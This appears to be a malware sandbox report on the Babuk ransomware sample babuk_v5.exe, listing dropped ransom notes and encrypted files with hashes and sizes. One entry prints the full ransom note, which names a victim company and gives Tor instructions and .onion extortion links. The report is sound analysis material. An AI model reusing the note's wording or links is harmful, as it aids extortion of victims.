                                                                            SSDEEP:192:7ox80taAeEh3S1/4c7GBH2j64oY/GKtLpL2/rVQJAMz+fidFD40brStlfgmMxEW6:GXA1rGBHA64TGKRpqjV0Xzco940/Szy8
                                                                            MD5:A17B7334F0DB153F0E8BD64440C8D267
                                                                            SHA1:621F5A73E16DFF53CFF9D70D782326A4237402AD
                                                                            SHA-256:2A42561D51A43970B337F7A9275F72F57B9DAE1A68F613D731F7826C6250531C
                                                                            SHA-512:9851669A45BA3A1AAA495C55A51BCC53855F39CA2D894BC9CE060A4C632D4770DAD8FDE9620D6AE46BF97034904E334B69131E2839201386D467FF0372BED8C3
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Credentials\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Feeds Cache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Feeds\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\GameDVR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\InputPersonalization\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\01_Music_auto_rated_at_5_stars.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1212
                                                                            Entropy (8bit):7.839325018591277
                                                                            Encrypted:false
                                                                            SSDEEP:24:yGzR7fx+HloTOCY/rfZmtgFAQ7rT71nW6nQYont/:yGx5kPCY/ggFB46Qznt/
                                                                            MD5:94A8AAE8C42A0BFB92E6A0C57F5CB86E
                                                                            SHA1:F8FAB19384338FF20A39FD70C945F0F33E63666C
                                                                            SHA-256:A1B8B223111D92611B5EDEA6C843AEDEDD3169E97876553DFAA96EE0D1169717
                                                                            SHA-512:34D9DFF382E9F8AF654D76454F490B23B73AD46AE4B9D459B3C19629803040E5EC62DC3F130CA549B4E13602107FC506590EEA8A93F658CAAAC1779D7902B92F
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\02_Music_added_in_the_last_month.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1447
                                                                            Entropy (8bit):7.839619013613921
                                                                            Encrypted:false
                                                                            SSDEEP:24:feXSSJ0wt5xasyrKc7J/ZNgm9vIMa2ClmN1pSNlNmqPgVGrG0Ose6p3h80YBns:mxCwMDrKcVTPtI8C0JGNmYpOC80Yhs
                                                                            MD5:5313B091735CDF712A835C5B197959AF
                                                                            SHA1:BACA4C7AA9C05234F105C74CEA9F760919B1C6D9
                                                                            SHA-256:9C5DE65DAF5C01537725435B54C999310E440D524FAFDB08E9F9BE9753A5A342
                                                                            SHA-512:D077D0B1EC34CC33E5237AF84E6D328B1F591AC60F54B5EC63846BE3EA4A1E0AF8688F2C4C9FD9319BFC7420C95B71B7196DDB597AA6CB1AF6E9A0EA340BDC27
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\03_Music_rated_at_4_or_5_stars.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1435
                                                                            Entropy (8bit):7.868758795898455
                                                                            Encrypted:false
                                                                            SSDEEP:24:O+JmnsKYJrzc+tDziLhVratnAHJ45uRulILE+syNtmO03wq:OkmnXGrrzsHra+uiu6LovOywq
                                                                            MD5:176074C6A049081A208C62F0CE52F1AD
                                                                            SHA1:B5311DCFCBC85FE97E559D58F14E64C6C0CA9FAE
                                                                            SHA-256:C2B69ED63402F59BA7458B2043728820AB27D98426318C2B99C7A2B6242C58EE
                                                                            SHA-512:C6C3ECFF7BA7D6FB5A61AB4CC6CFD85BCAA75ECFBDE29A5AFD8AA6540EE8C1D5CEA1A5747A9B1CC7E43BADE366C951A8D2B569F717AB7F3463E5B13F51D3D369
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\04_Music_played_in_the_last_month.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1452
                                                                            Entropy (8bit):7.84887411652016
                                                                            Encrypted:false
                                                                            SSDEEP:24:Bx+uK+3iXNaoL0VV5QOePgmRGTaFHjpLPN7PmyEHSYZMErfxsSilJywXNDtdmg8Y:GuTMkoLkVSOeYKljZN6n2Of2XJywXlH3
                                                                            MD5:47AD0CDE37A9AEBAF5CE373661648459
                                                                            SHA1:52C3279FC650CB279A6E18EA2F68CF2530643098
                                                                            SHA-256:7BAD6A6E9BE9D6835F1771B42D8E9A6D984413AB6C0F09845232B5E8C722FFBD
                                                                            SHA-512:0D0E9A00F2F5320BB3C6B57D7E37A424279B08564203A05AA975DC3E8D90991F0A51D015953294819CDE74EC4823EF0E03F7826DCD63AAF7E91E38C5A71C1D7F
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\05_Pictures_taken_in_the_last_month.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):965
                                                                            Entropy (8bit):7.7671433751443715
                                                                            Encrypted:false
                                                                            SSDEEP:24:uy+QjPr7MJezI0VBAUunpJUdwgo4Ht558kOfME:uy7jT7MJWZ2E/VT8kqME
                                                                            MD5:74F31EE6D5F4BE0C0745A600DC8F7EC4
                                                                            SHA1:6A646B2BA563FF5D4F4D9E09B084BD2743A6C826
                                                                            SHA-256:9BCAA59FAA2A9CF5FFC8CF5CEA546055432BA8E7278EFD650C5498F179F70830
                                                                            SHA-512:07BC8EA2E6922379DC7CBD7AE9A772552709A080DE7788205689E0871822096DEBA5AD551E83C4F20D1CCC24786E3A4FEFE236150CA42ED7860E03788E36F3F3
                                                                            Malicious:false
                                                                            Preview: [encrypted bytes omitted] choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\06_Pictures_rated_4_or_5_stars.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):953
                                                                            Entropy (8bit):7.7463496657368625
                                                                            Encrypted:false
                                                                            SSDEEP:24:1AABNcg16JbakaT67nHr0Jt+1MQR8LyyDDJxJZKGeX7:1AA7cgMbDaQMuILKZ
                                                                            MD5:75FD2BA44A344B1B727FA283B204E16B
                                                                            SHA1:681912204D04ABAF1A33A009D49812AA1F25F942
                                                                            SHA-256:FA3FED8E8C91DBBA9CFCDC92D5616A5527F91F0070CD695BD625F99A4619019D
                                                                            SHA-512:30070498EF1AB2840505A0B53CA146255D2EBB04B8AE89E91DDB176762FBD7B9AF8ADAFC0309101FCAFFEAA4965D113B6342AF639F34F6AE8242819EE9F523B8
                                                                            Malicious:false
                                                                            Preview: [encrypted bytes omitted] choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\07_TV_recorded_in_the_last_week.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1208
                                                                            Entropy (8bit):7.816897546567165
                                                                            Encrypted:false
                                                                            SSDEEP:24:nDHV1bdX6SgdtBYamOfBgLywKuCAUk/Xnn6ebxdQPxL:DH96fLBIuBgLywKbSqebYL
                                                                            MD5:23FF065B072D288C80DD1A3C375816AE
                                                                            SHA1:6B305BC64F9D58040CB033523854B25D1C045D62
                                                                            SHA-256:42A8FC00F664E958B10D95702BB5FB2996789E4910D76CA7700CDB7FEE841313
                                                                            SHA-512:3803FDA0E86CB9F8255DD3D76AE78371CDAFC34D35477E2484AB2C1CFEE3C2B63285E15F3F198039F2C7805510ACAB6BDAE9D1C68808EFE0B5F59EE218EF53DE
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\08_Video_rated_at_4_or_5_stars.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1188
                                                                            Entropy (8bit):7.814888381987446
                                                                            Encrypted:false
                                                                            SSDEEP:24:/SDfk8Sw9nRe78/EPtIiMoDYves6/xmH1oFh3LBRUFU4t4G:/SDfYw9nRe78cF1zDV/JmHyFbRUKVG
                                                                            MD5:BEC011EAC7DB918AA23AF73BC7E88A25
                                                                            SHA1:F20DFB7CCEFE03739B6B151F9702C77DF6CE47A1
                                                                            SHA-256:56D4FD0CFA63559087B6B36556CC0AB0C5E57F917534AFD5525866A7106C7780
                                                                            SHA-512:40E2289AA54E0F8E7288CADE1B293024D50D5785552054A1938C25A663DFD6EDF2FB00AF8EB83B00C9C992C7C87B7709BB25FCEA4B527420C278F5177CE866C5
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\09_Music_played_the_most.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1193
                                                                            Entropy (8bit):7.825440189625794
                                                                            Encrypted:false
                                                                            SSDEEP:24:dYGc6H1QntUmUwkLBmDjbGvyysIiBR5xeA8u/KQW3GAzBBvUSxHT3:quHKtUmURMOvyb/eAl/56G8UIHj
                                                                            MD5:BB2C2CC528702860E5FAD4CC938B0AE3
                                                                            SHA1:D1D2D6E0841C4541B1D3F953B658EBA3F2C5911B
                                                                            SHA-256:AFC4DE637D8BECE1525543CAD88B9D3D9DBA2C3F827A293F138C0902C59EAE7E
                                                                            SHA-512:48C151BC6D730A184BADB067BCC255C161C3568BE46FFA5A85C0E5EBC2DCACD709D2E792BC2B50F703A718B478E39DF1CCEA4718DE998AB3760F9BA83EA8F4EE
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\10_All_Music.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1231
                                                                            Entropy (8bit):7.813908417938988
                                                                            Encrypted:false
                                                                            SSDEEP:24:bozT3G1dwx/1oFXkxpOftpQwLwwVYU6Y1d/rNEcRacU1:b03obkx+t2OwwVwY1d/xlvU1
                                                                            MD5:A5FB5F17BAADB87D9FA06345C6F529E6
                                                                            SHA1:33CF8BDF842675EA471B13D038A5490C40122F1B
                                                                            SHA-256:F43ECAE13CDC33F9917F15BCE8BEDB37A12F3E84E6CB8C709DB092A97AE9FE63
                                                                            SHA-512:83BBB1D4E4CE0AAE40D9A390F806C22432200FA96D894A6017B5D0AEDF0C0625A8832C55BED846D15F487854F9555D2AFB5D87ACFC41F4A551C1A9054A2CBD94
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\11_All_Pictures.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):753
                                                                            Entropy (8bit):7.672034080018253
                                                                            Encrypted:false
                                                                            SSDEEP:12:QYpGqI96uxNgdFDny71zSbirRln1zig2cS3GV1xQogJbzzSaknCX5ZZK:Qao9hNQyoiH1zqDGV1xQ9xzzSRU5ZM
                                                                            MD5:0EDB8A1C09A06DBBF035EDCCC6689BB1
                                                                            SHA1:E50F3D770A30C09B21967A3A2CC5C3BA6A87107C
                                                                            SHA-256:A8A75D16BAFB1C1FF208EA4302E21ED1A2CC86878E4BD40C41167ABDD1C5946E
                                                                            SHA-512:C6FA36C786D6934C48FB81278E505895F9F7DBF9D5A934D5912C058ACD20206EEAE42FA2A43B712EF03FB51C680D4FC0D7106472DC3B2295A6114013B5B7A190
                                                                            Malicious:false
                                                                            Preview: [encrypted bytes omitted] choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\12_All_Video.wpl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1247
                                                                            Entropy (8bit):7.831293715924999
                                                                            Encrypted:false
                                                                            SSDEEP:24:RXBufN7QlYdeExUl//vP0VDTDGSSeZaF7qMm/9SdTiRtp:juJmXPmvDGSSuaF7qMO9SMRtp
                                                                            MD5:2888EF809B96939B04B5D60A8F6CCC71
                                                                            SHA1:D5C9530BFC48A5A08752B8C2D0DB69BE56ABE7AD
                                                                            SHA-256:D0F4D6EC4150DB96213B3D0C95753A2ABF2F5AC3AEF1FF8BF6196957055CA3B7
                                                                            SHA-512:1FC82278BBF43D01F07ED1545A7B00AB12621B3A00A6927DD37958964E60C5E315709F17BBE066F8A3BC2FC9B7BF287CD50DFB09BFDABD2D0F6F0F14C527BC20
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Office\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):820
                                                                            Entropy (8bit):7.726129252997927
                                                                            Encrypted:false
                                                                            SSDEEP:24:PeR5bmJdyJcnTxDuWr/uJakLNCH46Z5PWLzHJ:Pe2Jd74auIkpCY6n+np
                                                                            MD5:A18E5D510D8CAC250399291D8E042140
